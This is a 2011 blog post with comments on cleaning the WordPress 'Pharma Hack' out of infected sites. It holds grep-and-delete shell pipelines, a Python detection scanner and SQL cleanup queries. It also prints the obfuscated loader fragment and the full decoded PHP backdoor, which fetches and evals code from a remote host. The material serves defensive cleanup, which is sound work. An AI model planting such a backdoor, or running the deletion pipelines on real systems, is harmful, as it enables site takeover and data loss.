
Removing WordPress Pharma Hack

July 11, 2011 by Cotton Rohrscheib 3 Comments

Pleth, LLC, and probably one of the sharpest guys I know, and we toiled over this thing daily for about a week or so until we finally eradicated it from all of our WordPress installations. For the benefit of all of you that are still wrestling w/ this hack, here’s exactly how we removed it…

Locate all base64_decode

This hack, like a lot of others, used base64 code to disguise JavaScript, so we have to locate it and remove it. This is what it will look like:

<?php $XZKsyG='as';$RqoaUO='e';$ygDOEJ=$XZKsyG.'s'.$RqoaUO.'r'.'t';$joEDdb='b'.$XZKsyG.$RqoaUO.(64).'_'.'d'.$RqoaUO.'c'.'o'.'d'.$RqoaUO;@$ygDOEJ(@$joEDdb('ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY.......and so on...

To locate and remove the code, you will need to SSH into your server, cd into the WordPress home directory and run the following:

grep -r 'php $[a-zA-Z]*=.as.;' * |awk -F : '{print $1}' | xargs -I{} rm -v {}

This will scan the entire folder and all its sub-directories for any file containing the string "php $RANDOMLETTERS='as'" and delete it verbosely. If you do not wish to delete the files automatically, run this instead to just print the filenames:

grep -r 'php $[a-zA-Z]*=.as.;' * |awk -F : '{print $1}'

When we did this, there were about 50 files that contained the exploit. There are other files containing nasty code as well. You will also need to search for and remove files containing the string "wp_class_support".

grep -r wp_class_support * |awk -F : '{print $1}' |xargs -I{} rm -v {}

This bit of syntax will search for files with that string and delete them (if you want to manually delete them, leave off the xargs part as per the above example).

I also found this nasty thing (not sure if it is related to the Pharma Hack) in several files. All were WordPress core files, so you MUST replace every WordPress file on your site with clean ones. DO NOT do this via the internal utility; use FTP, SCP, or whatever to get these files uploaded. Once you have done this, run:

grep -r QGluaV9yZXN0b * |awk -F : '{print $1}'

This will search the remaining files for the exploit (QGluaV9yZXN0b is the start of the base64 encoding of "@ini_restore("). Any files containing this MUST be replaced or you are still infected. The full exploit is a long base64-encoded string (omitted here); it decodes to the following PHP, which re-enables restricted ini settings, silences error logging, and then fetches and eval()s whatever a remote host returns whenever a request carries an sh parameter:

@ini_restore("safe_mode");@ini_restore("open_basedir");@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");@ini_restore("disable_functions");@ini_restore("allow_url_fopen");
if(@function_exists('ini_set'))
{@ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1);
@ini_set('allow_url_fopen',1);}else{@ini_alter('error_log',NULL); @ini_alter('log_errors',0);
@ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1);}
function GetShellContent($host,$url){if(@function_exists('curl_init'))
{$full_url='http://'.$host.'/'.$url;$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,$full_url);curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_HEADER,false);curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0');$data=@curl_exec($curl);
curl_close($curl);return $data;}elseif(@function_exists('fsockopen'))
{$fp=@fsockopen($host,80,$errno,$errstr,10);
if($fp){$out="GET /$url"." HTTP/1.0\r\n";$out .="Host: $host\r\n";
$out .="User-Agent: Mozilla/4.0\r\n";$out .="Connection: Close\r\n\r\n";
@fwrite($fp,$out);while($ans[]=fgets($fp));fclose($fp);$ans=trim(implode('',$ans));
$data=(trim(substr($ans,strpos($ans,"\r\n\r\n"))));
return $data;}}elseif(@function_exists('file_get_contents') && @ini_get('allow_url_fopen')==1)
{$full_url='http://'.$host.'/'.$url;$data=@file_get_contents($full_url);return $data;}}
if($_REQUEST['sh'] != "")
{eval(base64_decode(GetShellContent("\x73\x65\x6f\x74\x6f\x6f\x73\x2e\x63\x6f\x6d","s/i.php?"
.$_REQUEST['sh']."&host=".urlencode($_SERVER['SERVER_NAME'])."&url=".urlencode
($_SERVER['REQUEST_URI']))));exit;}

I went ahead and scanned the whole site for files that contained base64_decode calls. To search for these, run the following:

grep -r base64 * |awk -F : '{print $1}' |sort |uniq

This will print out a list of each file that contains the string "base64". You should examine each file carefully for rogue content, as many files legitimately contain this string and need it to function. If you are unsure of the code, replace the file with a fresh copy. Most of the infected files I've seen have the base64 statement at the very top of the file, but this is not always the case.
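As an added example (not code from the original post), here is a report-only Python scanner that combines the grep checks above: the obfuscated loader pattern, the wp_class_support marker, the QGluaV9yZXN0b string, and any long base64 literal passed to base64_decode(), which it decodes and inspects instead of trusting the string match alone. The indicator names it reports are my own labels.

```python
import base64
import re
from pathlib import Path

# Indicators taken from the post: the obfuscated loader that assembles
# 'assert'/'base64_decode' from string pieces, the wp_class_support marker,
# and QGluaV9yZXN0b, the start of the base64 encoding of '@ini_restore('
# that opens the remote-eval backdoor decoded above.
LOADER_RE = re.compile(r"php\s+\$[A-Za-z]+=.as.;")
MARKER = "wp_class_support"
BACKDOOR_B64_PREFIX = "QGluaV9yZXN0b"
# A long base64 literal passed straight to base64_decode(): worth decoding.
B64_LITERAL_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{40,})['\"]")
SUSPICIOUS_DECODED = ("eval(", "@ini_restore(", "$_REQUEST", "GetShellContent")


def classify(text):
    """Return the list of indicator names found in one file's contents."""
    hits = []
    if LOADER_RE.search(text):
        hits.append("loader")
    if MARKER in text:
        hits.append(MARKER)
    if BACKDOOR_B64_PREFIX in text:
        hits.append("backdoor")
    # Decode any base64 literal handed to base64_decode() and inspect it,
    # so a payload that is not the exact string from the post is still caught.
    for m in B64_LITERAL_RE.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("latin-1")
        except ValueError:
            continue
        if any(s in decoded for s in SUSPICIOUS_DECODED):
            hits.append("base64_payload")
            break
    return hits


def scan_tree(root):
    """Map each suspicious file under root (relative path) to its indicators.

    Report-only: nothing is deleted, so you can replace flagged core files
    from a clean WordPress copy, as the post recommends, instead of rm-ing.
    """
    findings = {}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        hits = classify(path.read_text(encoding="latin-1"))
        if hits:
            findings[str(path.relative_to(root))] = hits
    return findings
```

Run scan_tree() against the WordPress root; files that only mention base64 for legitimate reasons (e.g. base64_encode) are not reported, which trims the list the plain grep for "base64" produces.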

Once you get the files cleaned, you need to work on the database. The exploit adds and/or modifies entries in the wp_options table. Using the MySQL interpreter or phpMyAdmin run the following query:

SELECT * FROM `wp_options` where `option_name` LIKE 'rss%' ORDER BY `wp_options`.`option_name` ASC;

This will search the wp_options table for all entries beginning with rss_ and return them. You will need to delete each one that looks similar to this:

rss_552afe0001e673901a9f2caebdd3141d

rss_ followed by a string of random numbers or letters is bad and MUST be deleted, as these entries are added by the exploit. The exploit also adds or modifies several other records in the same table. A couple of the sites we found recommended running these queries as well, since these options should not be set or contain any data:

delete from wp_options where option_name = "class_generic_support";
delete from wp_options where option_name = "widget_generic_support";
delete from wp_options where option_name = "fwp";
delete from wp_options where option_name = "wp_check_hash";
delete from wp_options where option_name = "ftp_credentials";

—————————————————————-

If all goes well, this information should help you eradicate the WordPress Pharma Hack from your WordPress installation. For a more detailed post on how to remove this hack, I highly recommend Matt Critcher's post on his blog…


About Cotton Rohrscheib

The Cotton Club is a monthly podcast hosted by me, Cotton Rohrscheib. I'm a 52 year old entrepreneur w/ ADHD, OCD (and now AARP) that refuses to grow up as I grow old. I have collaborated and invested in hundreds of projects throughout my career in multiple industries such as; technology, healthcare, and agriculture. I also have 25 years experience in the marketing industry as a co-founder of an award-winning advertising agency. I will undoubtedly cover a wide variety of topics on my podcast while sharing some really crazy stories and situations that I've been fortunate to witness firsthand. I also have a book coming out in 2025 titled, "Mistakes were Made"

Comments

  1. Ken Ray says

    July 13, 2011 at 12:49 am

    As I posted over at wordpress.org, the easiest way for a novice (like myself) to find the infected file is to list the PHP files by SIZE in FTP.
    The one that has the thousands of lines of base64 encoded strings sticks out like a sore thumb.
    Thanks for your attention to this subject. It was a real nightmare for me.

    • Cotton Rohrscheib says

      July 13, 2011 at 1:05 pm

      No problem. This hack has been a nightmare for a lot of people I think.

  2. Hiral says

    March 6, 2012 at 2:01 am

    This is a nice article. I used your commands so many times to clean our sites. We were successfully able to clean our site, but we keep becoming a victim of the hack again and again. Any suggestions on what to do?

Content Copyright: 2001-2025
Cotton Rohrscheib | Rohrscheib Capital